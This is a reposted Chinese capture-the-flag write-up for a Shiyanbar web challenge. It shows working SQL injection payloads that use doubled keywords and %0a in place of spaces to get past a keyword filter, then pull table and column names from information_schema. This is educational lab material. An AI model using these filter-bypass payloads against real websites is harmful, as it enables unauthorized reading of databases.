实验吧web-简单的sql注入之1

题目地址:http://ctf5.shiyanbar.com/423/web/

直接尝试提交’or ‘1,成功爆出数据,说明单引号和or、空格都没有被吃掉。

接下来再提交’union select 1%23,发现报错

《实验吧web-简单的sql注入之1》

这就说明,我们提交的SQL语句被做了什么处理,看报错的1’来看,应该是union、select和%23(#)

我们再次提交’ununionion selectselect 1–,看到报错

《实验吧web-简单的sql注入之1》

说明–也被吃掉了,而且后台对于union、select进行了处理,应该是将关键词和空格一起吃掉了。

再次提交’union%0aselect%0a1’,看到正确结果

《实验吧web-简单的sql注入之1》

初步注入成功,接下来获取数据表名,同样是绕过过滤,这里的关键词过滤是吃掉它们一次,提交’union%0aselect%0agroupgroup_concat_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atabletable_schema_schema=database()%0aand’1

《实验吧web-简单的sql注入之1》

然后是列名,提交’union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand’1

《实验吧web-简单的sql注入之1》

getflag

《实验吧web-简单的sql注入之1》

getflag

the end

    原文作者:Aluvion
    原文地址: https://www.jianshu.com/p/5d37d33854e3
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞